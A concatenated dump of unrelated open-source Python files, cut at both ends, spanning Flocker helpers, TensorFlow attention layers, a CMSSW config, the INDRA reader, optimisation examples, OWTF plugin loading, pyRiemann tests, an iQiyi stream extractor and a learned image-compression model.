print(f"{file} saved successfully.\n")
time.sleep(sec)
except KeyboardInterrupt:
print("End of script by user interrupt")
|
flocker/provision/_effect.py
|
stackriot/flocker
| 2,690 |
76172
|
<filename>flocker/provision/_effect.py
from functools import partial
from six import reraise
from characteristic import attributes
from effect import (
sync_performer, Effect,
ComposedDispatcher, TypeDispatcher, base_dispatcher)
from treq import get
from pyrsistent import PClass, field
from txeffect import deferred_performer
from eliot import startAction, Message
from eliot.twisted import DeferredContext
# This is from https://github.com/radix/effect/pull/46
@attributes(['results', 'exc_info'], apply_immutable=True)
class SequenceFailed(Exception, object):
"""
Raised if an effect in a :class:``Sequence`` fails.
:ivar list results: The list of successful results.
:ivar error: The error result of the last run effect.
"""
def __str__(self):
# Exception has a custom __str__ that looks at arguments pass to it's
# init. Since we don't pass any, it is useless. The following will
# duplicate the class name in the traceback, but is better than
# otherwise.
return repr(self)
@attributes(["effects"], apply_with_init=False, apply_immutable=True)
class Sequence(object):
"""
Runs a sequence of effects serially.
:returns list: The list of results of the effects.
:raises SequenceFailed: If one of the effects fails.
"""
def __init__(self, effects):
"""
:param effects: The list of effects to execute in sequence.
"""
self.effects = effects
def sequence(effects):
"""
Given multiple Effects, return one Effect that represents the sequence of
all of their effects. The result of the aggregate Effect will be a list of
their results, in the same order as the input to this function. If any
child effect fails, the first such failure will be propagated as a
:class:`SequenceFailed` exception.
:param effects: Effects which should be performed in sequence.
:return: An Effect that results in a list of results, or which fails with
a :class:`SequenceFailed`.
"""
return Effect(Sequence(list(effects)))
@sync_performer
def perform_sequence(dispatcher, intent):
"""Performer for :class:`Sequence`."""
effects = list(intent.effects)
if not effects:
return []
results = []
def succeed(next_effect, result):
results.append(result)
return next_effect
def fail(result):
reraise(SequenceFailed,
SequenceFailed(results=results, exc_info=result),
result[2])
def reducer(next_effect, effect):
return effect.on(success=partial(succeed, next_effect),
error=fail)
return reduce(reducer, reversed(effects), results)
class HTTPGet(PClass):
"""
Intent for HTTP GET requests.
:ivar bytes url: The URL to make a GET request to.
"""
url = field(type=bytes, mandatory=True)
def http_get(url):
"""
Wrapper to create an :class:`HTTPGet` Effect.
:param bytes url: The url to make a GET request to.
:returns: The ``Effect`` of making a GET request to ``url``.
"""
return Effect(HTTPGet(url=url))
@deferred_performer
def treq_get(dispatcher, intent):
"""
Performer to execute an HTTP GET.
:param dispatcher: The dispatcher used to dispatch this performance.
:param HTTPGet intent: The intent to be performed.
"""
action = startAction(action_type=u"flocker:provision:_effect:treq_get")
with action.context():
Message.log(url=intent.url)
# Do not use persistent HTTP connections, because they will not be
# cleaned up by the end of the test.
d = DeferredContext(get(intent.url, persistent=False))
d.addActionFinish()
return d.result
dispatcher = ComposedDispatcher([
TypeDispatcher({
Sequence: perform_sequence,
HTTPGet: treq_get,
}),
base_dispatcher,
])
|
language/question_answering/decatt_docreader/layers/decomposable_attention.py
|
naveenjafer/language
| 1,199 |
76211
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of decomposable attention model.
https://arxiv.org/abs/1606.01933.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from language.common.layers import common_layers
from language.common.utils import tensor_utils
import tensorflow.compat.v1 as tf
def decomposable_attention(emb1, len1, emb2, len2, hidden_size, hidden_layers,
dropout_ratio, mode, epsilon=1e-8):
"""See https://arxiv.org/abs/1606.01933.
Args:
emb1: A Tensor with shape [batch_size, max_len1, emb_size] representing the
first input sequence.
len1: A Tensor with shape [batch_size], indicating the true sequence length
of `emb1`. This is required due to padding.
emb2: A Tensor with shape [batch_size, max_len2, emb_size] representing the
second input sequence.
len2: A Tensor with shape [batch_size], indicating the true sequence length
of `emb1`. This is required due to padding.
hidden_size: An integer indicating the size of each hidden layer in the
feed-forward neural networks.
hidden_layers: An integer indicating the number of hidden layers in the
feed-forward neural networks.
dropout_ratio: The probability of dropping out each unit in the activation.
This can be None, and is only applied during training.
mode: One of the keys from tf.estimator.ModeKeys.
epsilon: A small positive constant to add to masks for numerical stability.
Returns:
final_emb: A Tensor with shape [batch_size, hidden_size].
"""
# [batch_size, maxlen1]
mask1 = tf.sequence_mask(len1, tensor_utils.shape(emb1, 1), dtype=tf.float32)
# [batch_size, maxlen2]
mask2 = tf.sequence_mask(len2, tensor_utils.shape(emb2, 1), dtype=tf.float32)
with tf.variable_scope("attend"):
projected_emb1 = common_layers.ffnn(
emb1, [hidden_size] * hidden_layers, dropout_ratio, mode)
with tf.variable_scope("attend", reuse=True):
projected_emb2 = common_layers.ffnn(
emb2, [hidden_size] * hidden_layers, dropout_ratio, mode)
# [batch_size, maxlen1, maxlen2]
attention_scores = tf.matmul(projected_emb1, projected_emb2, transpose_b=True)
attention_weights1 = tf.nn.softmax(
attention_scores + tf.log(tf.expand_dims(mask2, 1) + epsilon), 2)
attention_weights2 = tf.nn.softmax(
attention_scores + tf.log(tf.expand_dims(mask1, 2) + epsilon), 1)
# [batch_size, maxlen1, emb_size]
attended_emb1 = tf.matmul(attention_weights1, emb2)
# [batch_size, maxlen2, emb_size]
attended_emb2 = tf.matmul(attention_weights2, emb1, transpose_a=True)
with tf.variable_scope("compare"):
compared_emb1 = common_layers.ffnn(
tf.concat([emb1, attended_emb1], -1),
[hidden_size] * hidden_layers,
dropout_ratio, mode)
with tf.variable_scope("compare", reuse=True):
compared_emb2 = common_layers.ffnn(
tf.concat([emb2, attended_emb2], -1),
[hidden_size] * hidden_layers,
dropout_ratio, mode)
compared_emb1 *= tf.expand_dims(mask1, -1)
compared_emb2 *= tf.expand_dims(mask2, -1)
# [batch_size, hidden_size]
aggregated_emb1 = tf.reduce_sum(compared_emb1, 1)
aggregated_emb2 = tf.reduce_sum(compared_emb2, 1)
with tf.variable_scope("aggregate"):
final_emb = common_layers.ffnn(
tf.concat([aggregated_emb1, aggregated_emb2], -1),
[hidden_size] * hidden_layers,
dropout_ratio,
mode)
return final_emb
|
IOPool/Input/test/test_make_multi_lumi_cfg.py
|
ckamtsikis/cmssw
| 852 |
76216
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("WRITE")
process.source = cms.Source("EmptySource", numberEventsInLuminosityBlock = cms.untracked.uint32(4))
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(20))
process.out = cms.OutputModule("PoolOutputModule", fileName = cms.untracked.string("multi_lumi.root"))
process.o = cms.EndPath(process.out)
|
indra/sources/reach/reader.py
|
zebulon2/indra
| 136 |
76217
|
<filename>indra/sources/reach/reader.py
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
import os
import logging
from indra import get_config
# Before the import, we have to deal with the CLASSPATH to avoid clashes
# with Eidos.
def _set_classpath():
clp = os.environ.get('CLASSPATH')
eip = get_config('EIDOSPATH')
rep = get_config('REACHPATH')
clp_parts = clp.split(':') if clp else []
new_clp_parts = []
has_reach = False
# Look at all the parts of the CLASSPATH
for part in clp_parts:
# If Eidos is on the CLASSPATH, remove it
if not eip or os.path.abspath(part) != eip:
new_clp_parts.append(part)
# If REACH is not on the CLASSPATH, add it
if rep and os.path.abspath(part) == rep:
has_reach = True
if rep and not has_reach:
new_clp_parts.append(rep)
# Set the new CLASSPATH
new_clp = ':'.join(new_clp_parts)
os.environ['CLASSPATH'] = new_clp
_set_classpath()
from indra.java_vm import autoclass, JavaException
logger = logging.getLogger(__name__)
class ReachOfflineReadingError(Exception):
pass
class ReachReader(object):
"""The ReachReader wraps a singleton instance of the REACH reader.
This allows calling the reader many times without having to wait for it to
start up each time.
Attributes
----------
api_ruler : org.clulab.reach.apis.ApiRuler
An instance of the REACH ApiRuler class (java object).
"""
def __init__(self):
self.api_ruler = None
def get_api_ruler(self):
"""Return the existing reader if it exists or launch a new one.
Returns
-------
api_ruler : org.clulab.reach.apis.ApiRuler
An instance of the REACH ApiRuler class (java object).
"""
if self.api_ruler is None:
try:
self.api_ruler = \
autoclass('org.clulab.reach.export.apis.ApiRuler')
except JavaException as e:
raise ReachOfflineReadingError(e)
return self.api_ruler
|
examples/singleobjective/simulated_annealing/simulated_annealing_binary.py
|
12yuens2/jMetalPy
| 335 |
76226
|
from jmetal.algorithm.singleobjective.simulated_annealing import SimulatedAnnealing
from jmetal.operator import BitFlipMutation
from jmetal.problem import OneMax
from jmetal.util.solution import print_function_values_to_file, print_variables_to_file
from jmetal.util.termination_criterion import StoppingByEvaluations
if __name__ == '__main__':
problem = OneMax(number_of_bits=1024)
max_evaluations = 20000
algorithm = SimulatedAnnealing(
problem=problem,
mutation=BitFlipMutation(probability=1.0 / problem.number_of_bits),
termination_criterion=StoppingByEvaluations(max_evaluations=max_evaluations)
)
algorithm.run()
result = algorithm.get_result()
# Save results to file
print_function_values_to_file(result, 'FUN.'+ algorithm.get_name() + "." + problem.get_name())
print_variables_to_file(result, 'VAR.' + algorithm.get_name() + "." + problem.get_name())
print('Algorithm: ' + algorithm.get_name())
print('Problem: ' + problem.get_name())
print('Solution: ' + result.get_binary_string())
print('Fitness: ' + str(result.objectives[0]))
print('Computing time: ' + str(algorithm.total_computing_time))
|
owtf/managers/plugin.py
|
Udbhavbisarya23/owtf
| 1,514 |
76235
|
<reponame>Udbhavbisarya23/owtf<gh_stars>1000+
"""
owtf.managers.plugin
~~~~~~~~~~~~~~~~~~~~
This module manages the plugins and their dependencies
"""
import imp
import json
import os
from owtf.models.plugin import Plugin
from owtf.models.test_group import TestGroup
from owtf.settings import PLUGINS_DIR
from owtf.utils.error import abort_framework
from owtf.utils.file import FileOperations
TEST_GROUPS = ["web", "network", "auxiliary"]
def get_test_groups_config(file_path):
"""Reads the test groups from a config file
.. note::
This needs to be a list instead of a dictionary to preserve order in python < 2.7
:param file_path: The path to the config file
:type file_path: `str`
:return: List of test groups
:rtype: `list`
"""
test_groups = []
config_file = FileOperations.open(file_path, "r").read().splitlines()
for line in config_file:
if "#" == line[0]:
continue # Skip comments
try:
code, priority, descrip, hint, url = line.strip().split(" | ")
except ValueError:
abort_framework(
"Problem in Test Groups file: '{!s}' -> Cannot parse line: {!s}".format(
file_path, line
)
)
if len(descrip) < 2:
descrip = hint
if len(hint) < 2:
hint = ""
test_groups.append(
{
"code": code,
"priority": priority,
"descrip": descrip,
"hint": hint,
"url": url,
}
)
return test_groups
def load_test_groups(session, file_default, file_fallback, plugin_group):
"""Load test groups into the DB.
:param test_groups_file: The path to the test groups config
:type test_groups_file: `str`
:param plugin_group: Plugin group to load
:type plugin_group: `str`
:return: None
:rtype: None
"""
file_path = file_default
if not os.path.isfile(file_default):
file_path = file_fallback
test_groups = get_test_groups_config(file_path)
for group in test_groups:
session.merge(
TestGroup(
code=group["code"],
priority=group["priority"],
descrip=group["descrip"],
hint=group["hint"],
url=group["url"],
group=plugin_group,
)
)
session.commit()
def load_plugins(session):
"""Loads the plugins from the filesystem and updates their info.
.. note::
Walks through each sub-directory of `PLUGINS_DIR`.
For each file, loads it thanks to the imp module.
Updates the database with the information for each plugin:
+ 'title': the title of the plugin
+ 'name': the name of the plugin
+ 'code': the internal code of the plugin
+ 'group': the group of the plugin (ex: web)
+ 'type': the type of the plugin (ex: active, passive, ...)
+ 'descrip': the description of the plugin
+ 'file': the filename of the plugin
+ 'internet_res': does the plugin use internet resources?
:return: None
:rtype: None
"""
# TODO: When the -t, -e or -o is given to OWTF command line, only load
# the specific plugins (and not all of them like below).
# Retrieve the list of the plugins (sorted) from the directory given by
# 'PLUGIN_DIR'.
plugins = []
for root, _, files in os.walk(PLUGINS_DIR):
plugins.extend(
[
os.path.join(root, filename)
for filename in files
if filename.endswith("py")
]
)
plugins = sorted(plugins)
# Retrieve the information of the plugin.
for plugin_path in plugins:
# Only keep the relative path to the plugin
plugin = plugin_path.replace(PLUGINS_DIR, "")
# TODO: Using os.path.sep might not be portable especially on
# Windows platform since it allows '/' and '\' in the path.
# Retrieve the group, the type and the file of the plugin.
# Ensure all empty strings are removed from the list
chunks = list(filter(None, plugin.split(os.path.sep)))
# TODO: Ensure that the variables group, type and file exist when
# the length of chunks is less than 3.
if len(chunks) == 3:
group, type, file = chunks
# Retrieve the internal name and code of the plugin.
name, code = os.path.splitext(file)[0].split("@")
# Only load the plugin if in XXX_TEST_GROUPS configuration (e.g. web_testgroups.cfg)
if session.query(TestGroup).get(code) is None:
continue
# Load the plugin as a module.
filename, pathname, desc = imp.find_module(
os.path.splitext(os.path.basename(plugin_path))[0],
[os.path.dirname(plugin_path)],
)
plugin_module = imp.load_module(
os.path.splitext(file)[0], filename, pathname, desc
)
# Try te retrieve the `attr` dictionary from the module and convert
# it to json in order to save it into the database.
attr = None
try:
attr = json.dumps(plugin_module.ATTR)
except AttributeError: # The plugin didn't define an attr dict.
pass
# Save the plugin into the database.
session.merge(
Plugin(
key="{!s}@{!s}".format(type, code),
group=group,
type=type,
title=name.title().replace("_", " "),
name=name,
code=code,
file=file,
descrip=plugin_module.DESCRIPTION,
attr=attr,
)
)
session.commit()
def get_types_for_plugin_group(session, plugin_group):
"""Get available plugin types for a plugin group
:param plugin_group: Plugin group
:type plugin_group: `str`
:return: List of available plugin types
:rtype: `list`
"""
plugin_types = session.query(Plugin.type).filter_by(
group=plugin_group
).distinct().all()
plugin_types = [i[0] for i in plugin_types]
return plugin_types
def plugin_gen_query(session, criteria):
"""Generate a SQLAlchemy query based on the filter criteria
:param criteria: Filter criteria
:type criteria: `dict`
:return:
:rtype:
"""
query = session.query(Plugin).join(TestGroup)
if criteria.get("type", None):
if isinstance(criteria["type"], str):
query = query.filter(Plugin.type == criteria["type"])
if isinstance(criteria["type"], list):
query = query.filter(Plugin.type.in_(criteria["type"]))
if criteria.get("group", None):
if isinstance(criteria["group"], str):
query = query.filter(Plugin.group == criteria["group"])
if isinstance(criteria["group"], list):
query = query.filter(Plugin.group.in_(criteria["group"]))
if criteria.get("code", None):
if isinstance(criteria["code"], str):
query = query.filter(Plugin.code == criteria["code"])
if isinstance(criteria["code"], list):
query = query.filter(Plugin.code.in_(criteria["code"]))
if criteria.get("name", None):
if isinstance(criteria["name"], str):
query = query.filter(Plugin.name == criteria["name"])
if isinstance(criteria["name"], list):
query = query.filter(Plugin.name.in_(criteria["name"]))
return query.order_by(TestGroup.priority.desc())
def get_all_plugin_dicts(session, criteria=None):
"""Get plugin dicts based on filter criteria
:param criteria: Filter criteria
:type criteria: `dict`
:return: List of plugin dicts
:rtype: `list`
"""
if criteria is None:
criteria = {}
if "code" in criteria:
criteria["code"] = Plugin.name_to_code(session, criteria["code"])
query = plugin_gen_query(session, criteria)
plugin_obj_list = query.all()
plugin_dicts = []
for obj in plugin_obj_list:
plugin_dicts.append(obj.to_dict())
return plugin_dicts
def get_plugins_by_type(session, plugin_type):
"""Get plugins based on type argument
:param plugin_type: Plugin type
:type plugin_type: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"type": plugin_type})
def get_plugins_by_group(session, plugin_group):
"""Get plugins by plugin group
:param plugin_group: Plugin group
:type plugin_group: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"group": plugin_group})
def get_plugins_by_group_type(session, plugin_group, plugin_type):
"""Get plugins by group and plugin type
:param plugin_group: Plugin group
:type plugin_group: `str`
:param plugin_type: plugin type
:type plugin_type: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"type": plugin_type, "group": plugin_group})
|
tests/test_utils_geodesic.py
|
qbarthelemy/pyRiemann
| 301 |
76263
|
<reponame>qbarthelemy/pyRiemann
import numpy as np
from pyriemann.utils.geodesic import (
geodesic_riemann,
geodesic_euclid,
geodesic_logeuclid,
geodesic,
)
from pyriemann.utils.mean import mean_riemann, mean_logeuclid, mean_euclid
import pytest
from pytest import approx
def get_geod_func():
geod_func = [geodesic_riemann, geodesic_euclid, geodesic_logeuclid]
for gf in geod_func:
yield gf
def get_geod_name():
geod_name = ["riemann", "euclid", "logeuclid"]
for gn in geod_name:
yield gn
@pytest.mark.parametrize(
"geodesic_func", [geodesic_riemann, geodesic_euclid, geodesic_logeuclid]
)
class GeodesicFuncTestCase:
def test_simple_mat(self, geodesic_func, get_covmats):
n_channels = 3
if geodesic_func is geodesic_euclid:
A = 1.0 * np.eye(n_channels)
B = 2.0 * np.eye(n_channels)
Ctrue = 1.5 * np.eye(n_channels)
else:
A = 0.5 * np.eye(n_channels)
B = 2 * np.eye(n_channels)
Ctrue = np.eye(n_channels)
self.geodesic_0(geodesic_func, A, B)
self.geodesic_1(geodesic_func, A, B)
self.geodesic_middle(geodesic_func, A, B, Ctrue)
def test_random_mat(self, geodesic_func, get_covmats):
n_trials, n_channels = 2, 5
covmats = get_covmats(n_trials, n_channels)
A, B = covmats[0], covmats[1]
if geodesic_func is geodesic_euclid:
Ctrue = mean_euclid(covmats)
elif geodesic_func is geodesic_logeuclid:
Ctrue = mean_logeuclid(covmats)
elif geodesic_func is geodesic_riemann:
Ctrue = mean_riemann(covmats)
self.geodesic_0(geodesic_func, A, B)
self.geodesic_1(geodesic_func, A, B)
self.geodesic_middle(geodesic_func, A, B, Ctrue)
class TestGeodesicFunc(GeodesicFuncTestCase):
def geodesic_0(self, geodesic_func, A, B):
assert geodesic_func(A, B, 0) == approx(A)
def geodesic_1(self, geodesic_func, A, B):
assert geodesic_func(A, B, 1) == approx(B)
def geodesic_middle(self, geodesic_func, A, B, Ctrue):
assert geodesic_func(A, B, 0.5) == approx(Ctrue)
@pytest.mark.parametrize("metric", get_geod_name())
def test_distance_wrapper_simple(metric):
n_channels = 3
if metric == "euclid":
A = 1.0 * np.eye(n_channels)
B = 2.0 * np.eye(n_channels)
Ctrue = 1.5 * np.eye(n_channels)
else:
A = 0.5 * np.eye(n_channels)
B = 2 * np.eye(n_channels)
Ctrue = np.eye(n_channels)
assert geodesic(A, B, 0.5, metric=metric) == approx(Ctrue)
@pytest.mark.parametrize("met, gfunc", zip(get_geod_name(), get_geod_func()))
def test_distance_wrapper_random(met, gfunc, get_covmats):
n_trials, n_channels = 2, 5
covmats = get_covmats(n_trials, n_channels)
A, B = covmats[0], covmats[1]
if gfunc is geodesic_euclid:
Ctrue = mean_euclid(covmats)
elif gfunc is geodesic_logeuclid:
Ctrue = mean_logeuclid(covmats)
elif gfunc is geodesic_riemann:
Ctrue = mean_riemann(covmats)
assert geodesic(A, B, 0.5, metric=met) == approx(Ctrue)
|
ykdl/extractors/iqiyi/video.py
|
SeaHOH/ykdl
| 136 |
76291
|
<reponame>SeaHOH/ykdl
# -*- coding: utf-8 -*-
from .._common import *
from .util import md5, md5x, cmd5x
# vms
# src=1702633101b340d8917a69cf8a4b8c7c
# salt=t6hrq6k0n6n6k6qdh6tje6wpb62v7654
# salt=u6fnp3eok0dpftcq9qbr4n9svk8tqh7u
# src=02020031010000000000
# salt=3sj8xof48xof4tk9f4tk9ypgk9ypg5ul
def gettmts(tvid, vid):
tm = int(time.time() * 1000)
key = 'd5fb4bd9d50c4be6948c97edd7254b0e'
host = 'https://cache.m.iqiyi.com'
params = {
'src': '76f90cbd92f94a2e925d83e8ccd22cb7',
'sc': md5(str(tm) + key + vid),
't': tm
}
req_url = '{host}/tmts/{tvid}/{vid}/'.format(**vars())
return get_response(req_url, params=params).json()
def getdash(tvid, vid, bid=500):
cmd5x_null = cmd5x('')
tm = int(time.time() * 1000)
host = 'https://cache.video.iqiyi.com'
params = urlencode({
#'uid': '',
'k_uid': get_random_id(32, 'k_uid'), # necessary
#'dfp': dfp,
#'pck': '',
#'bop': '{{"version":"10.0","dfp":"{dfp}"}}'.format(dfp=dfp),
# keys above are relative to cookies
'tvid': tvid,
'bid': bid,
'vid': vid,
'src': '01010031010000000000',
'vt': 0,
'rs': 1,
'ori': 'pcw',
'ps': 1,
'pt': 0,
'd': 0,
's': '',
'lid': '',
'cf': '',
'ct': '',
'authKey': cmd5x('{cmd5x_null}{tm}{tvid}'.format(**vars())),
'k_tag': 1,
'ost': 0,
'ppt': 0,
'locale': 'zh_cn',
'prio': '{"ff":"f4v","code":2}',
'k_err_retries': 0,
'up': '',
'qd_v': 2,
'tm': tm,
'qdy': 'a',
'qds': 0,
'ut': 0, # 600 bid isn't available
# relative to encode
#'k_ft1': ,
#'k_ft4': ,
#'k_ft5': ,
})
src = '/dash?' + params
vf = cmd5x(src)
req_url = '{host}{src}&vf={vf}'.format(**vars())
return get_response(req_url).json()
def getvps(tvid, vid):
tm = int(time.time() * 1000)
host = 'http://cache.video.qiyi.com'
params = urlencode({
'tvid': tvid,
'vid': vid,
'v': 0,
'qypid': '{}_12'.format(tvid),
'src': '01012001010000000000',
't': tm,
'k_tag': 1,
'k_uid': get_random_id(32, 'k_uid'),
'rs': 1,
})
src = '/vps?' + params
vf = md5x(src)
req_url = '{host}{src}&vf={vf}'.format(**vars())
return get_response(req_url).json()
class Iqiyi(Extractor):
name = '爱奇艺 (Iqiyi)'
vd_2_id = dict(sum([[(vd, id) for vd in vds] for id, vds in {
'4K': [10, 19],
'BD': [5, 18, 600],
'TD': [4, 17, 500],
'HD': [2, 14, 21, 75, 300],
'SD': [1, 200],
'LD': [96, 100]
}.items()], []))
id_2_profile = {
'4K': '4K',
'BD': '1080p',
'TD': '720p',
'HD': '540p',
'SD': '360p',
'LD': '210p'
}
def prepare(self):
info = MediaInfo(self.name)
if self.url and not self.vid:
vid = match(self.url, 'curid=([^_]+)_([\w]+)')
if vid:
self.vid = vid
try:
info_json = get_response(
'http://pcw-api.iqiyi.com/video/video/playervideoinfo',
params={'tvid': self.vid[0]}).json()
info.title = info_json['data']['vn']
except:
self.vid = None
def get_vid():
html = get_content(self.url)
video_info = match1(html, ":video-info='(.+?)'")
if video_info:
video_info = json.loads(video_info)
self.vid = str(video_info['tvId']), str(video_info['vid'])
info.title = video_info['name']
else:
tvid = match1(html,
'tvId:\s*"([^"]+)',
'data-video-tvId="([^"]+)',
'''\['tvid'\]\s*=\s*"([^"]+)''',
'"tvId":\s*([^,]+)')
videoid = match1(html,
'data-video-vid="([^"]+)',
'vid"?\'?\]?\s*(?:=|:)\s*"?\'?([^"\',]+)')
if not (tvid and videoid):
url = match1(html, '(www\.iqiyi\.com/v_\w+\.html)')
if url:
self.url = 'https://' + url
return get_vid()
self.vid = (tvid, videoid)
info.title = match1(html, '<title>([^<]+)').split('-')[0]
if self.url and not self.vid:
get_vid()
tvid, vid = self.vid
assert tvid and vid, "can't play this video!!"
def push_stream_vd(vs):
vd = vs['vd']
stream = self.vd_2_id[vd]
stream_profile = self.id_2_profile[stream]
fmt = vs.get('fileFormat')
if fmt:
stream += '-' + fmt
m3u8 = vs['m3utx']
info.streams[stream] = {
'video_profile': stream_profile,
'container': 'm3u8',
'src': [m3u8],
'size': 0
}
def push_stream_bid(url_prefix, bid, container, fs_array, size):
stream = self.vd_2_id[bid]
real_urls = []
for seg_info in fs_array:
url = url_prefix + seg_info['l']
json_data = get_response(url).json()
down_url = json_data['l']
real_urls.append(down_url)
stream_profile = self.id_2_profile[stream]
info.streams[stream] = {
'video_profile': stream_profile,
'container': container,
'src': real_urls,
'size': size
}
def fetch_tmts():
#raise
# try use tmts first
# less http requests, get results quickly
tmts_data = gettmts(tvid, vid)
assert tmts_data['code'] == 'A00000'
vs_array = tmts_data['data']['vidl']
for vs in vs_array:
push_stream_vd(vs)
vip_conf = tmts_data['data'].get('ctl', {}).get('configs')
if vip_conf:
for vds in (('5', '18'), ('10', '19')):
for vd in vds:
if vd in vip_conf:
tmts_data = gettmts(tvid, vip_conf[vd]['vid'])
if tmts_data['code'] == 'A00000':
push_stream_vd(tmts_data['data'])
break
def fetch_vps():
# use vps as preferred fallback
vps_data = getvps(tvid, vid)
assert vps_data['code'] == 'A00000'
url_prefix = vps_data['data']['vp'].get('du')
assert url_prefix
vs_array = vps_data['data']['vp']['tkl'][0]['vs']
for vs in vs_array:
bid = vs['bid']
fs_array = vs['fs']
size = vs['vsize']
push_stream_bid(url_prefix, bid, 'flv', fs_array, size)
def fetch_dash():
# use dash as fallback
for bid in (500, 300, 200, 100):
dash_data = getdash(tvid, vid, bid)
assert dash_data['code'] == 'A00000'
url_prefix = dash_data['data'].get('dd')
if url_prefix is None:
continue
streams = dash_data['data']['program']['video']
for stream in streams:
if 'fs' in stream:
_bid = stream['bid']
container = stream['ff']
fs_array = stream['fs']
size = stream['vsize']
push_stream_bid(url_prefix, _bid, container, fs_array, size)
break
for fetch in (fetch_tmts, fetch_vps, fetch_dash):
try:
fetch()
break
except AssertionError:
break
except Exception as e:
self.logger.debug(e, exc_info=True)
continue
assert info.streams, "can't play this video!!"
return info
def prepare_list(self):
html = get_content(self.url)
return matchall(html, 'data-tvid=\"([^\"]+)\" data-vid=\"([^\"]+)\"')
site = Iqiyi()
|
src/model.py
|
markveillette/high-fidelity-generative-compression
| 266 |
76314
|
<filename>src/model.py
"""
Stitches submodels together.
"""
import numpy as np
import time, os
import itertools
from functools import partial
from collections import defaultdict, namedtuple
import torch
import torch.nn as nn
import torch.nn.functional as F
# Custom modules
from src import hyperprior
from src.loss import losses
from src.helpers import maths, datasets, utils
from src.network import encoder, generator, discriminator, hyper
from src.loss.perceptual_similarity import perceptual_loss as ps
from default_config import ModelModes, ModelTypes, hific_args, directories
Intermediates = namedtuple("Intermediates",
["input_image", # [0, 1] (after scaling from [0, 255])
"reconstruction", # [0, 1]
"latents_quantized", # Latents post-quantization.
"n_bpp", # Differential entropy estimate.
"q_bpp"]) # Shannon entropy estimate.
Disc_out= namedtuple("disc_out",
["D_real", "D_gen", "D_real_logits", "D_gen_logits"])
class Model(nn.Module):
def __init__(self, args, logger, storage_train=defaultdict(list), storage_test=defaultdict(list), model_mode=ModelModes.TRAINING,
model_type=ModelTypes.COMPRESSION):
super(Model, self).__init__()
"""
Builds hific model from submodels in network.
"""
self.args = args
self.model_mode = model_mode
self.model_type = model_type
self.logger = logger
self.log_interval = args.log_interval
self.storage_train = storage_train
self.storage_test = storage_test
self.step_counter = 0
if self.args.use_latent_mixture_model is True:
self.args.latent_channels = self.args.latent_channels_DLMM
if not hasattr(ModelTypes, self.model_type.upper()):
raise ValueError("Invalid model_type: [{}]".format(self.model_type))
if not hasattr(ModelModes, self.model_mode.upper()):
raise ValueError("Invalid model_mode: [{}]".format(self.model_mode))
self.image_dims = self.args.image_dims # Assign from dataloader
self.batch_size = self.args.batch_size
self.entropy_code = False
if model_mode == ModelModes.EVALUATION:
self.entropy_code = True
self.Encoder = encoder.Encoder(self.image_dims, self.batch_size, C=self.args.latent_channels,
channel_norm=self.args.use_channel_norm)
self.Generator = generator.Generator(self.image_dims, self.batch_size, C=self.args.latent_channels,
n_residual_blocks=self.args.n_residual_blocks, channel_norm=self.args.use_channel_norm, sample_noise=
self.args.sample_noise, noise_dim=self.args.noise_dim)
if self.args.use_latent_mixture_model is True:
self.Hyperprior = hyperprior.HyperpriorDLMM(bottleneck_capacity=self.args.latent_channels,
likelihood_type=self.args.likelihood_type, mixture_components=self.args.mixture_components, entropy_code=self.entropy_code)
else:
self.Hyperprior = hyperprior.Hyperprior(bottleneck_capacity=self.args.latent_channels,
likelihood_type=self.args.likelihood_type, entropy_code=self.entropy_code)
self.amortization_models = [self.Encoder, self.Generator]
self.amortization_models.extend(self.Hyperprior.amortization_models)
# Use discriminator if GAN mode enabled and in training/validation
self.use_discriminator = (
self.model_type == ModelTypes.COMPRESSION_GAN
and (self.model_mode != ModelModes.EVALUATION)
)
if self.use_discriminator is True:
assert self.args.discriminator_steps > 0, 'Must specify nonzero training steps for D!'
self.discriminator_steps = self.args.discriminator_steps
self.logger.info('GAN mode enabled. Training discriminator for {} steps.'.format(
self.discriminator_steps))
self.Discriminator = discriminator.Discriminator(image_dims=self.image_dims,
context_dims=self.args.latent_dims, C=self.args.latent_channels)
self.gan_loss = partial(losses.gan_loss, args.gan_loss_type)
else:
self.discriminator_steps = 0
self.Discriminator = None
self.squared_difference = torch.nn.MSELoss(reduction='none')
# Expects [-1,1] images or [0,1] with normalize=True flag
self.perceptual_loss = ps.PerceptualLoss(model='net-lin', net='alex', use_gpu=torch.cuda.is_available(), gpu_ids=[args.gpu])
def store_loss(self, key, loss):
assert type(loss) == float, 'Call .item() on loss before storage'
if self.training is True:
storage = self.storage_train
else:
storage = self.storage_test
if self.writeout is True:
storage[key].append(loss)
def compression_forward(self, x):
"""
Forward pass through encoder, hyperprior, and decoder.
Inputs
x: Input image. Format (N,C,H,W), range [0,1],
or [-1,1] if args.normalize_image is True
torch.Tensor
Outputs
intermediates: NamedTuple of intermediate values
"""
image_dims = tuple(x.size()[1:]) # (C,H,W)
if self.model_mode == ModelModes.EVALUATION and (self.training is False):
n_encoder_downsamples = self.Encoder.n_downsampling_layers
factor = 2 ** n_encoder_downsamples
x = utils.pad_factor(x, x.size()[2:], factor)
# Encoder forward pass
y = self.Encoder(x)
if self.model_mode == ModelModes.EVALUATION and (self.training is False):
n_hyperencoder_downsamples = self.Hyperprior.analysis_net.n_downsampling_layers
factor = 2 ** n_hyperencoder_downsamples
y = utils.pad_factor(y, y.size()[2:], factor)
hyperinfo = self.Hyperprior(y, spatial_shape=x.size()[2:])
latents_quantized = hyperinfo.decoded
total_nbpp = hyperinfo.total_nbpp
total_qbpp = hyperinfo.total_qbpp
# Use quantized latents as input to G
reconstruction = self.Generator(latents_quantized)
if self.args.normalize_input_image is True:
reconstruction = torch.tanh(reconstruction)
# Undo padding
